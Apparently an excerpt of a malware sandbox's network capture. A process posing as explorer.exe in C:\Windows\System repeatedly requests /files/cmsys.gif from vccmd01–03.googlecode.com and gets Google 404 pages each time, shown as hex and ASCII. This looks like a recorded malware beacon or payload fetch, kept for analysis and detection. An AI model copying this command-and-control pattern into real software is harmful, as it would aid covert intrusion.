                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:28.981250048 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    104192.168.2.56076564.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:31.365390062 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:32.297209024 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:32 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:32.297271013 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    105192.168.2.560766108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:32.521361113 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:33.442915916 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:33 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:33.442976952 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    106192.168.2.560767142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:33.908828974 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:34.828706026 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:34 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:34.828768015 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    107192.168.2.56076964.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:37.111749887 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:38.034362078 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:37 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:38.034385920 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    108192.168.2.560770108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:38.568933010 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:39.391829967 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:39 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:39.392221928 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    109192.168.2.560771142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:39.607043028 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:40.527546883 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:40 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:40.527584076 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    110192.168.2.56077364.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:42.805378914 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:43.750358105 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:43 GMT
